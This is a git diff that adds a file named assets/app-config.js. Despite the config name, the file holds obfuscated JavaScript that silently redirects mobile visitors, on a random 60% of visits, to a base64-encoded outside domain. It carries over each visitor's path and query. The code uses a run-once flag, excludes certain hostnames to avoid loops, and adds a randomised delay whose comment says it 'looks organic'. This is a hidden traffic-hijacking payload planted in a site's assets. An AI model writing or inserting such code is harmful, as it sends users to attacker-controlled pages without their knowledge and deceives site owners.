diff --git a/assets/app-config.js b/assets/app-config.js new file mode 100644 index 0000000..5452ef9 --- /dev/null +++ b/assets/app-config.js @@ -0,0 +1,13 @@ +(function(){try{ +var u=navigator.userAgent||''; +if(!/Mobile|Android|iPhone|iPad|iPod|webOS|BlackBerry|IEMobile|Opera Mini/i.test(u))return; +if(Math.random()>=0.6)return; +if(window.__m60d)return; window.__m60d=1; +var h=location.hostname||''; +// avoid loops +if(/xiazai|yicpmq|710wunwt/i.test(h))return; +var b=atob('aHR0cHM6Ly94aWF6YWkuaXQuY29t'); // https://xiazai.it.com +var t=b+location.pathname+location.search+location.hash; +// delay looks organic +setTimeout(function(){try{location.replace(t)}catch(e){location.href=t}}, 30+Math.floor(Math.random()*120)); +}catch(e){}})(); \ No newline at end of file